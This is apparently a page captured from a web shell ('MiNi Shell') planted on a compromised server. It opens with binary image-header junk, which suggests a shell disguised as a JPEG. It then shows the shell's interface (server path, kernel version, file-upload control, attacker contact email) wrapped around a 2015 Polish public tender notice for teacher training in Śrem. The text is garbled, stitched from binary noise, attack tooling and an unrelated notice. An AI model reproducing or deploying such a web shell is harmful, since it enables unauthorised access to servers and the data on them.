JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150130/21904-N-2015.html

<p class="kh_header"><b>Śrem: PRZEPROWADZENIE OFERT DOSKONALENIA W RAMACH ROCZNYCH PLANÓW WSPOMAGANIA</b><br>
<b>Numer ogłoszenia: 21904 - 2015; data zamieszczenia: 30.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. Marciniaka 2, 63-100 Śrem, woj. wielkopolskie, tel. 61 2834864, faks 61 2834864.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE OFERT DOSKONALENIA W RAMACH ROCZNYCH PLANÓW WSPOMAGANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przeprowadzenie ofert doskonalenia w ramach Rocznych Planów Wspomagania w ramach realizacji projektu pn. Wsparcie rozwoju szkół i przedszkoli z terenu powiatu śremskiego poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli.
2.	Projekt współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół. 
3.	Głównym celem projektu jest podniesienie jakości funkcjonowania systemu doskonalenia nauczycieli 
w powiecie śremskim poprzez stworzenie planów wspomagania spójnych z rozwojem szkół i przedszkoli, 
z terenu powiatu śremskiego, w obszarach wymagających szczególnego wsparcia. Projekt trwa dwa lata, 
tj. od 01.08.2013r. do 31.07.2015r. W roku szkolnym 2014/2015 projekt obejmie wsparciem gimnazja oraz szkoły ponadgimnazjalne.
4.	Wykonawca zobowiązuje się do przeprowadzenia doskonalenia nauczycieli zgodnie z Rocznym Planem Wspomagania, w dwóch następujących formach doskonalenia:
a)	warsztaty dla nauczycieli - aktywne metody szkoleniowe angażujące uczestników w różnego rodzaju ćwiczenia, gry, symulacje lub inne działania mające na celu nabywanie wiedzy, doskonalenie umiejętności oraz kształtowanie postaw uczestników; przewiduje się 16 godzin dydaktycznych na grupę warsztatową 
(4 spotkania po 4 godziny dydaktyczne)
b)	grupowe konsultacje - spotkanie zespołu nauczycieli, które ma na celu zwiększenie kompetencji uczestników w zakresie tematyki objętej wspomaganiem; grupowe konsultacje zaplanowano po określonym czasie przeznaczonym na wdrażanie już nabytej wiedzy i zbieranie doświadczeń; przewiduje się 4 godziny dydaktyczne (2 spotkania po 2 godziny dydaktyczne) na grupę warsztatową
5.	Zamówienie dzieli się na 2 części:

1)	Część zamówienia nr I: Przeprowadzenie oferty doskonalenia pn. Jak pomóc uczniowi osiągnąć sukces edukacyjny?

Miejsce wykonywania usługi:
-	Gimnazjum im. Powstańców Wlkp. w Dolsku; ul. Kościańska 8A, 63-140 Dolsk
-	Zespół Szkół Technicznych w Śremie - Technikum; ul. Staszica 3, 63-100 Śrem

Zakres tematyczny ww. oferty obejmuje m.in.
1)	Gimnazjum w Dolsku
-	tworzenie i dobór narzędzi do diagnozowania osiągnięć uczniów z różnych przedmiotów;
-	sposoby diagnozowania i analizowania  wyników diagnoz, opracowywanie wniosków z analiz oraz  sposoby i metody ich wdrażania na poszczególnych przedmiotach;
-	wykorzystywanie programu EXEL w diagnozowaniu i analizowaniu osiągnięć uczniów oraz wykorzystywanie informacji i interpretacja wyników zamieszczanych na platformach  EWD

2)	Zespół Szkół Technicznych w Śremie
-	budowa  i wdrażanie programu naprawczego w celu podniesienia osiągnięć edukacyjnych uczniów z przedmiotów zawodowych;
-	nabycie umiejętności budowania wspólnej strategii pracy nauczycieli przedmiotów zawodowych na rzecz wspierania rozwoju zawodowego ucznia;
-	aktywizowanie uczniów poprzez stosowanie skutecznych metod pracy w szkołach ponadgimnazjalnych w celu podniesienia jakości pracy szkoły.

Ilość godzin: 
Łącznie 60 godzin dydaktycznych (trzy grupy warsztatowe, w tym dwie w ZST), w tym: 
a)	warsztaty: 48 godzin dydaktycznych (4 spotkania, średnio 2 razy w miesiącu po 4 godziny) - 16 godzin/ 1 grupa warsztatowa
b)	grupowe konsultacje: 12 godzin dydaktycznych (4 godziny/ 1 grupa warsztatowa: 2 spotkania po 2 godziny) 


2)	Część zamówienia nr II: Przeprowadzenie oferty doskonalenia pn. Nauczyciel 45+

Miejsce wykonywania usługi:
-	Gimnazjum im. Jana Pawła II w Manieczkach; ul. Szkolna 6, 63-112 Brodnica

Zakres tematyczny ww. oferty obejmuje m.in.
-	higiena i emisja głosu - nabycie/ćwiczenie umiejętności związanych z pracą głosem,
-	sposoby radzenia sobie ze stresem- w tym techniki relaksacyjne, dieta dla mózgu, jak radzić sobie ze zmęczeniem psychofizycznym,
-	wypalenie zawodowe -gdzie szukać wsparcia- także psychicznego i dowartościowania, 
-	moja prezencja a różnica pokoleń - jak zmienić wizerunek zewnętrzny nauczyciela
-	techniki negocjacji oraz trening asertywności
-	informacje dotyczące profilaktyki chorób zawodowych nauczycieli oraz uprawnienia wynikające z problemów zdrowotnych nauczycieli
-	pomoc w budowaniu programów rozwoju osobistego dotyczących siły i odporności psychicznej, komunikacji interpersonalnej, asertywności, radzenia sobie ze stresem, .
-	rozpoznawanie istotnych elementów stresu i wypalenia zawodowego,
Ilość godzin: 
Łącznie 20 godzin dydaktycznych, w tym: 
a)	warsztaty: 16 godzin dydaktycznych (4 spotkania, średnio 2 razy w miesiącu po 4 godziny) 
b)	grupowe konsultacje: 4 godziny dydaktyczne (2 spotkania po 2 godziny) 
Zamawiający dopuszcza złożenia oferty na jedną, kilka, bądź wszystkie części zamówienia.

6.	Dodatkowe informacje:
a)	szkolenia mają odbywać się poza obowiązkowym czasem pracy dyrektorów /dyrektorek, nauczycieli/lek;
b)	szkolenie w formie warsztatów będzie oparte o aktywne metody szkoleniowe, angażujące uczestników w różnego rodzaju ćwiczenia, gry, symulacje lub inne działania mające na celu nabywanie wiedzy, doskonalenie umiejętności oraz kształtowanie postaw uczestników;
c)	Wykonawca ponosi odpowiedzialność za merytoryczną realizację form doskonalenia nauczycieli;
d)	w ramach wynagrodzenia Wykonawca w ramach zajęć zapewni uczestnikom poczęstunek tj. napoje (woda, sok), ciastka;
e)	w ramach wynagrodzenia zapewnieni uczestnikom projektu materiały szkoleniowe dla uczestników szkolenia odpowiadające programowi szkolenia, które po zakończeniu szkolenia przejdą na ich własność;
f)	w ramach realizacji przedmiotu zamówienia, na potrzeby szkoleń Zamawiający zapewni uczestnikom szkolenia sale dydaktyczne.
7.	Obowiązki Wykonawcy zostały określone we wzorze umowy, stanowiącym załącznik nr 7 do siwz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku przez złożenie oświadczenia ( załącznik nr 3do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku przez złożenie oświadczenia ( załącznik nr 3do siwz).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku przez złożenie oświadczenia ( załącznik nr 3do siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje:
a)	dla części zamówienia nr I: minimum 2 osoby zdolne do wykonania zamówienia, w tym minimum 1 osobę, która:
-	jest nauczycielem szkoły gimnazjalnej lub ponadgimnazjalnej z 10 letnim stażem pracy oraz z praktyczną znajomością tematyki szkolenia dot. diagnozowania osiągnięć uczniów, wykorzystywania platformy EWD w pracy szkoły
-	posiada minimum 3-letnie doświadczenie w pracy egzaminatora OKE w zakresie przedmiotów zawodowych .

b)	dla części zamówienia nr II: minimum 2 osoby zdolne do wykonania zamówienia, w tym minimum 1 osobę, która:
-	posiada wykształcenie wyższe II stopnie o kierunku psychologia lub pedagogika
-	posiada minimum 3-letnie doświadczenie szkoleniowe, tj. warsztatowe, wykładowe lub eksperckie z zakresu wypalenia zawodowego, sposobów radzenia sobie ze stresem, technik negocjacji, asertywności
oraz minimum 1 osobę, która spełnia następujące warunki:
-	posiada wykształcenie wyższe II stopnia
-	posiada minimum 3-letnie doświadczenie szkoleniowe, tj. warsztatowe, wykładowe lub eksperckie z zakresie emisji głosu, pracy z głosem lub logopedii
Zamawiający dopuszcza łączenia stanowisk pod warunkiem spełnienia łącznie wszystkich warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku przez złożenie oświadczenia ( załącznik nr 3do siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	ofertę cenową, według wzoru stanowiącego załącznik nr 1 do siwz,
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale X pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział XIX pkt 2 siwz)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie kadry - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy: a) dopuszcza się zmianę osoby wskazanej w ofercie jedynie w formie pisemnej w przypadkach wystąpienia sytuacji losowych udokumentowanych przez Wykonawcę, tylko i wyłącznie za pisemną zgodą Zamawiającego, b) gdy nastąpi konieczność zmiany miejsca świadczenia usługi w przypadku, gdy Zamawiający nie będzie mógł z przyczyn losowych zapewnić miejsca wykonania przedmiotu zamówienia wskazanego w umowie z przyczyn od siebie niezależnych, a jednocześnie będzie miał możliwość zapewnienia innego miejsca świadczenia usługi. c) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia; d) gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności instytucją Zarządzającą, Pośredniczącą, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia; e) gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej; f) zmiana terminu realizacji przedmiotu, w przypadku gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego lub w przypadku działania siły wyższej, uniemożliwiającej wykonanie zamówienia w określonym pierwotnie terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.poradniappsrem.mojbip.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno - Pedagogiczna w Śremie, sekretariat, pok. nr 5, ul. Marciniaka 2, 63-100 Śrem..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2015 godzina 15:20, miejsce: Poradnia Psychologiczno - Pedagogiczna w Śremie, sekretariat, pok. nr 5, ul. Marciniaka 2, 63-100 Śrem.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu pn. Wsparcie rozwoju szkół i przedszkoli z terenu powiatu śremskiego poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie oferty doskonalenia pn. Jak pomóc uczniowi osiągnąć sukces edukacyjny?.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce wykonywania usługi: - Gimnazjum im. Powstańców Wlkp. w Dolsku; ul. Kościańska 8A, 63-140 Dolsk - Zespół Szkół Technicznych w Śremie - Technikum; ul. Staszica 3, 63-100 Śrem Zakres tematyczny ww. oferty obejmuje m.in. 1) Gimnazjum w Dolsku - tworzenie i dobór narzędzi do diagnozowania osiągnięć uczniów z różnych przedmiotów; - sposoby diagnozowania i analizowania wyników diagnoz, opracowywanie wniosków z analiz oraz sposoby i metody ich wdrażania na poszczególnych przedmiotach; - wykorzystywanie programu EXEL w diagnozowaniu i analizowaniu osiągnięć uczniów oraz wykorzystywanie informacji i interpretacja wyników zamieszczanych na platformach EWD 2) Zespół Szkół Technicznych w Śremie - budowa i wdrażanie programu naprawczego w celu podniesienia osiągnięć edukacyjnych uczniów z przedmiotów zawodowych; - nabycie umiejętności budowania wspólnej strategii pracy nauczycieli przedmiotów zawodowych na rzecz wspierania rozwoju zawodowego ucznia; - aktywizowanie uczniów poprzez stosowanie skutecznych metod pracy w szkołach ponadgimnazjalnych w celu podniesienia jakości pracy szkoły. Ilość godzin: Łącznie 60 godzin dydaktycznych (trzy grupy warsztatowe, w tym dwie w ZST), w tym: a) warsztaty: 48 godzin dydaktycznych (4 spotkania, średnio 2 razy w miesiącu po 4 godziny) - 16 godzin/ 1 grupa warsztatowa b) grupowe konsultacje: 12 godzin dydaktycznych (4 godziny/ 1 grupa warsztatowa: 2 spotkania po 2 godziny)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie kadry - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeprowadzenie oferty doskonalenia pn. Nauczyciel 45+.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce wykonywania usługi: - Gimnazjum im. Jana Pawła II w Manieczkach; ul. Szkolna 6, 63-112 Brodnica Zakres tematyczny ww. oferty obejmuje m.in. - higiena i emisja głosu - nabycie/ćwiczenie umiejętności związanych z pracą głosem, - sposoby radzenia sobie ze stresem- w tym techniki relaksacyjne, dieta dla mózgu, jak radzić sobie ze zmęczeniem psychofizycznym, - wypalenie zawodowe -gdzie szukać wsparcia- także psychicznego i dowartościowania, - moja prezencja a różnica pokoleń - jak zmienić wizerunek zewnętrzny nauczyciela - techniki negocjacji oraz trening asertywności - informacje dotyczące profilaktyki chorób zawodowych nauczycieli oraz uprawnienia wynikające z problemów zdrowotnych nauczycieli - pomoc w budowaniu programów rozwoju osobistego dotyczących siły i odporności psychicznej, komunikacji interpersonalnej, asertywności, radzenia sobie ze stresem, . - rozpoznawanie istotnych elementów stresu i wypalenia zawodowego, Ilość godzin: Łącznie 20 godzin dydaktycznych, w tym: a) warsztaty: 16 godzin dydaktycznych (4 spotkania, średnio 2 razy w miesiącu po 4 godziny) b) grupowe konsultacje: 4 godziny dydaktyczne (2 spotkania po 2 godziny)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenia kadry - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com